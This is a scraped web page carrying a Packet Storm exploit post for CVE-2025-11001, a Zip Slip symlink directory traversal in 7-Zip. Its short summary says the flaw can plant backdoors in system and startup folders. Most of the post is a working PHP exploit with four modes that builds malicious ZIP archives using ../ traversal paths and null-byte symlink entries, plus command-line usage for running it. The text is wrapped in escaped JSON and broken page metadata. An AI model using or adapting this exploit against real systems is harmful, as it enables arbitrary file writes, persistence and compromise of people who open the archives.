{“lastseen”:”2025-11-26T18:15:31″,”description”:”7-Zip version 25.00 suffers from a symlink directory traversal vulnerability. This write up provides analysis with a proof of concept…”,”published”:”2025-11-26T00:00:00″,”modified”:”2025-11-26T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 7-Zip 25.00 Zip Slip Directory Traversal”,”source”:””,”references”:””,”id”:”PACKETSTORM:212101″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-11001″],”sourceData”:”=============================================================================================================================================\\n | # Title : 7-Zip 25.00 Zip Slip Symlink Directory Traversal Vulnerability |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits) |\\n | # Vendor : https:\/\/www.7-zip.org\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/211932\/ \\u0026 CVE-2025-11001 \\n \\n [+] Summary :\\n \\n Multiple archive extraction implementations, including 7\u2011Zip versions prior to 25.00 and several ZIP libraries, improperly sanitize file paths during extraction.\\n An attacker can craft a malicious ZIP archive containing:\\n \\n Directory traversal sequences (..\/..\/..\/)\\n \\n Symlink entries\\n \\n Manipulated extra fields\\n \\n Null\u2011byte terminated link targets\\n \\n This allows files to be extracted outside the intended extraction folder and written to arbitrary locations on the victim system.\\n \\n [+] Vulnerability Class :\\n \\n Directory Traversal\\n \\n Arbitrary File Write\\n \\n Symlink Path Injection\\n \\n Null-byte truncation bug\\n \\n [+] Affected Software :\\n \\n 7\u2011Zip \\u003c 25.00 (Administrator-only exploitation on Windows)\\n \\n Any ZIP extraction tool vulnerable to Zip Slip (Java, PHP, Python, WinRAR variants…)\\n \\n Applications that use ZipArchive without proper sanitization\\n \\n [+] Impact\\n \\n A malicious ZIP archive allows an attacker to place files in arbitrary locations such as\\n \\n C:\\\\Windows\\\\System32\\\\\\n C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\\\n \/etc\/\\n \/var\/www\/html\/\\n \\n \\n [+] Possible consequences:\\n \\n Backdoor planting\\n \\n Privilege escalation\\n \\n Persistence via startup folders\\n \\n Overwriting sensitive files\\n \\n Gaining remote execution depending on file location created\\n \\n [+] Technical Details\\n \\n [+] Core Exploit Mechanism\\n \\n The attacker inserts filenames such as : ..\/..\/..\/..\/Windows\/System32\/evil.exe\\n \\n or a symlink entry: evil.lnk \u2192 ..\/..\/..\/..\/Users\/Public\/Documents\\\\0\\n \\n These paths bypass validators in 7\u2011Zip and other ZIP extractors when running with elevated privileges.\\n \\n poc\\n \\n \\u003c?php\\n \/*\\n ===========================================================\\n By Indoushka (Nekaa Salah eddine)\\n ===========================================================\\n *\/\\n \\n \/* ===========================================================\\n MODE 1 \u2014 Basic Zip Slip Exploit\\n (Former: build_zip duplicated 4 times)\\n =========================================================== *\/\\n function poc_zip_slip($target_path, $payload_file, $output_zip)\\n {\\n if (!file_exists($payload_file)) { die(\\”[-] Payload not found\\\\n\\”); }\\n \\n $payload_name = basename($payload_file);\\n $payload_data = file_get_contents($payload_file);\\n \\n $target = trim(str_replace(\\”\\\\\\\\\\”, \\”\/\\”, $target_path), \\”\/\\”) . \\”\/\\”;\\n $traversal = \\”..\/..\/..\/..\/\\” . $target;\\n \\n $zip = new ZipArchive();\\n if ($zip-\\u003eopen($output_zip, ZipArchive::CREATE | ZipArchive::OVERWRITE) !== TRUE) {\\n die(\\”[-] Failed to create ZIP\\\\n\\”);\\n }\\n \\n $zip-\\u003eaddFromString($traversal . $payload_name, $payload_data);\\n $zip-\\u003eclose();\\n \\n echo \\”[+] PoC: Zip Slip ZIP created: $output_zip\\\\n\\”;\\n }\\n \\n \\n \/* ===========================================================\\n MODE 2 \u2014 Manual Symlink ZIP Creator\\n =========================================================== *\/\\n function poc_symlink_zip($target_path, $output_zip)\\n {\\n $target = trim(str_replace(\\”\\\\\\\\\\”, \\”\/\\”, $target_path), \\”\/\\”) . \\”\/\\”;\\n $traversal = \\”..\/..\/..\/..\/\\” . $target;\\n \\n $name = \\”evil.lnk\\”;\\n $link = $traversal . \\”\\\\x00\\”;\\n \\n $extra = pack(\\”v\\”, 0x756e);\\n $extra .= pack(\\”v\\”, strlen($link));\\n $extra .= $link;\\n \\n $local = pack(\\”VvvvvvVVVvv\\”,\\n 0x04034b50, 20, 0x800, 0x800, 0,0,0,0,0,\\n strlen($name), strlen($extra)\\n );\\n \\n file_put_contents($output_zip, $local . $name . $extra);\\n \\n echo \\”[+] PoC: Symlink ZIP created: $output_zip\\\\n\\”;\\n }\\n \\n \\n \/* ===========================================================\\n MODE 3 \u2014 Full Manual ZIP Builder (Symlink + Payload)\\n =========================================================== *\/\\n function poc_manual_zip($target_path, $payload_file, $output_zip)\\n {\\n if (!file_exists($payload_file)) { die(\\”[-] Missing payload\\\\n\\”); }\\n \\n $payload_name = basename($payload_file);\\n $payload_data = file_get_contents($payload_file);\\n \\n $target = trim(str_replace(\\”\\\\\\\\\\”, \\”\/\\”, $target_path), \\”\/\\”) . \\”\/\\”;\\n $trav = \\”..\/..\/..\/..\/\\” . $target;\\n \\n $ln_name = \\”evil.lnk\\”;\\n $ln_target = $trav . \\”\\\\x00\\”;\\n $ln_extra = pack(\\”v\\”, 0x756e).pack(\\”v\\”,strlen($ln_target)).$ln_target;\\n \\n $f = fopen($output_zip, \\”wb\\”);\\n $off = 0;\\n \\n \/\/ Local: Symlink\\n $h1 = pack(\\”VvvvvvVVVvv\\”,\\n 0x04034b50,20,0×800,0x800,0,0,0,0,0,strlen($ln_name),strlen($ln_extra)\\n );\\n fwrite($f, $h1.$ln_name.$ln_extra);\\n $symlink_offset = $off;\\n $off += strlen($h1)+strlen($ln_name)+strlen($ln_extra);\\n \\n \/\/ Local: Payload\\n $h2 = pack(\\”VvvvvvVVVvv\\”,\\n 0x04034b50,20,0×800,0,0,0,0,strlen($payload_data),strlen($payload_data),\\n strlen($payload_name),0\\n );\\n fwrite($f, $h2.$payload_name.$payload_data);\\n $payload_offset = $off;\\n $off += strlen($h2)+strlen($payload_name)+strlen($payload_data);\\n \\n \/\/ Central Directory\\n $cd_start = $off;\\n \\n \/\/ CD: Symlink\\n $cd1 = pack(\\”VvvvvvVVVvvvvvVV\\”,\\n 0x02014b50,0x0317,20,0×800,0,0,0,0,0,0,\\n strlen($ln_name),strlen($ln_extra),0,0,0,(0777\\u003c\\u003c16)|0xA1ED,$symlink_offset\\n );\\n fwrite($f, $cd1.$ln_name.$ln_extra);\\n \\n \/\/ CD: Payload\\n $cd2 = pack(\\”VvvvvvVVVvvvvvVV\\”,\\n 0x02014b50,0x0317,20,0×800,0,0,0,0,\\n strlen($payload_data),strlen($payload_data),\\n strlen($payload_name),0,0,0,0,(0777\\u003c\\u003c16),$payload_offset\\n );\\n fwrite($f, $cd2.$payload_name);\\n \\n \/\/ EOCD\\n $eocd = pack(\\”VvvvvVVv\\”,\\n 0x06054b50,0,0,2,2,$off,$cd_start,0\\n );\\n fwrite($f, $eocd);\\n fclose($f);\\n \\n echo \\”[+] PoC: Manual ZIP generated: $output_zip\\\\n\\”;\\n }\\n \\n \\n \/* ===========================================================\\n MODE 4 \u2014 CVE\u20112025\u201111001 (7-Zip Directory Traversal)\\n =========================================================== *\/\\n function poc_cve_2025_11001($target, $payload, $output)\\n {\\n poc_manual_zip($target, $payload, $output);\\n \\n echo \\”[+] CVE-2025-11001 Archive Ready\\\\n\\”;\\n }\\n \\n \\n \/* ===========================================================\\n CLI Controller\\n =========================================================== *\/\\n \\n if (php_sapi_name() == \\”cli\\”)\\n {\\n $args = getopt(\\”\\”, [\\n \\”mode:\\”,\\n \\”target:\\”,\\n \\”payload::\\”,\\n \\”output::\\”\\n ]);\\n \\n if (!isset($args[\\”mode\\”])) {\\n die(\\”Usage:\\\\n\\n php exploit.php –mode=zip-slip –target=DIR –payload=file –output=out.zip\\n php exploit.php –mode=symlink –target=DIR –output=out.zip\\n php exploit.php –mode=manual –target=DIR –payload=file –output=out.zip\\n php exploit.php –mode=cve-2025-11001 –target=DIR –payload=file –output=exp.zip\\n \\”);\\n }\\n \\n $mode = $args[\\”mode\\”];\\n $target = $args[\\”target\\”] ?? null;\\n $payload= $args[\\”payload\\”] ?? null;\\n $output = $args[\\”output\\”] ?? \\”exploit.zip\\”;\\n \\n switch ($mode) {\\n case \\”zip-slip\\”:\\n poc_zip_slip($target, $payload, $output);\\n break;\\n \\n case \\”symlink\\”:\\n poc_symlink_zip($target, $output);\\n break;\\n \\n case \\”manual\\”:\\n poc_manual_zip($target, $payload, $output);\\n break;\\n \\n case \\”cve-2025-11001\\”:\\n poc_cve_2025_11001($target, $payload, $output);\\n break;\\n \\n default:\\n echo \\”Unknown mode.\\\\n\\”;\\n }\\n }\\n ?\\u003e\\n \\n \\n Save as : poc.php\\n \\n run : php poc.php\\n \\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212101″,”cvss”:{“score”:7.8,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:L\/AC:L\/PR:N\/UI:R\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:”3.0″,”vectorString”:”CVSS:3.0\/AV:L\/AC:H\/PR:N\/UI:R\/S:U\/C:H\/I:H\/A:H”,”baseScore”:7,”baseSeverity”:”HIGH”,”attackVector”:”LOCAL”,”attackComplexity”:”HIGH”,”privilegesRequired”:”NONE”,”userInteraction”:”REQUIRED”,”scope”:”UNCHANGED”,”confidentialityImpact”:”HIGH”,”integrityImpact”:”HIGH”,”availabilityImpact”:”HIGH”}},”href”:”https:\/\/packetstorm.news\/files\/id\/212101\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-11-26T18:15:31″,”description”:”7-Zip version 25.00 suffers from a symlink directory traversal vulnerability. This write up provides analysis with a proof of concept…”,”published”:”2025-11-26T00:00:00″,”modified”:”2025-11-26T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 7-Zip 25.00 Zip Slip Directory…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,28,12,15,13,53,7,11,5],"class_list":["post-27745","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-78","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n